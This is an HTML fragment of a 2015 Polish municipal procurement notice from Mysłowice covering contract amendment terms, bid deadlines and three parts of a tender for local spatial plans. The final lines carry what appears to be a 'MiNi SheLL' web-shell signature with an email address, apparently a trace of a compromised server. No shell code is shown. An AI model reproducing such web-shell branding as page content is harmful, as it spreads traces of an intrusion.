<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.
2. Zamawiający dopuszcza zmianę, o której mowa w ust. poprzedzającym, w odniesieniu do:
1) części zamówienia realizowanej z udziałem podwykonawcy/ów/ w przypadku utraty możliwości dysponownia osobami niezbędnymi do wykonania zamówienia;*
2) harmonogramu rzeczowo-terminowego realizacji przedmiotu umowy, w sytuacji wystąpienia okoliczności, o których mowa w § 2 ust. 2;
3) terminu wykonania przedmiotu umowy, w sytuacji wystąpienia okoliczności, o których mowa w § 2 ust. 2;
4) osoby głównego projektanta;
5) osoby wyznaczonej ze strony Zamawiającego do kontaktu w sprawach realizacji przedmiotu umowy;
6) wysokości wynagrodzenia w związku ze zmianą:
a) przepisów podatkowych;
b) sposobu finansowania przedmiotu umowy w przypadku możliwości zmian w budżecie Zamawiającego.
3. Zmiana postanowień zawartej umowy w odniesieniu do osoby głównego projektanta oraz osoby wyznaczonej ze strony Zamawiającego do kontaktu w sprawach realizacji przedmiotu umowy może nastąpić w przypadku:
1)  choroby lub innych zdarzeń losowych uniemożliwiających wykonywanie obowiązków wynikających z umowy;
2)  nie wywiązywania się z obowiązków wynikających z umowy;
3)  rezygnacji z wykonywania obowiązków wynikających z umowy.
4. Wykonawca nie może bez zgody Zamawiającego dokonać cesji wierzytelności wynikającej z niniejszej umowy na rzecz osób trzecich.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.myslowice.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Mysłowice, 
Wydział Zamówień Publicznych - pok. nr 305, ul. Powstańców 1, 41-400 Mysłowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2015 godzina 10:00, miejsce: oferty należy składać w Wydziale Zamówień Publicznych Urzędu Miasta Mysłowice, ul. Powstańców 1 - pok. nr 305.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z art. 24 ust. 2a uPzp, Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia, wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część nr 1: miejscowego planu zagospodarowania przestrzennego Brzezinka Północna w Mysłowicach - zgodnie z Uchwałą Rady Miasta Mysłowice Nr LXI/1168/14 z dnia 30 października 2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część nr 1 - MPZP Brzezinka Północna:
- powierzchnia obszaru planu [ha]: 105,
- liczba mieszkańców jednostki osadniczej objętej planem: 3076,
- skala rysunku planu: 1:1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 450.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część nr 2: miejscowego planu zagospodarowania przestrzennego Brzęczkowice Wschodnie w Mysłowicach - zgodnie z Uchwałą Rady Miasta Mysłowice Nr LXI/1169/14 z dnia 30 października 2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część nr 2 - MPZP Brzęczkowice Wschodnie:
- powierzchnia obszaru planu [ha]: 129,
- liczba mieszkańców jednostki osadniczej objętej planem: 7905,
- skala rysunku planu: 1:1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 450.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część nr 3: miejscowego planu zagospodarowania przestrzennego Kosztowy Północne w Mysłowicach - zgodnie z Uchwałą Rady Miasta Mysłowice Nr LXI/1170/14 z dnia 30 października 2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część nr 3 - MPZP Kosztowy Północne:
- powierzchnia obszaru planu [ha]: 48,
- liczba mieszkańców jednostki osadniczej objętej planem: 1275,
- skala rysunku planu: 1:1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 450.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania zamówienia - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com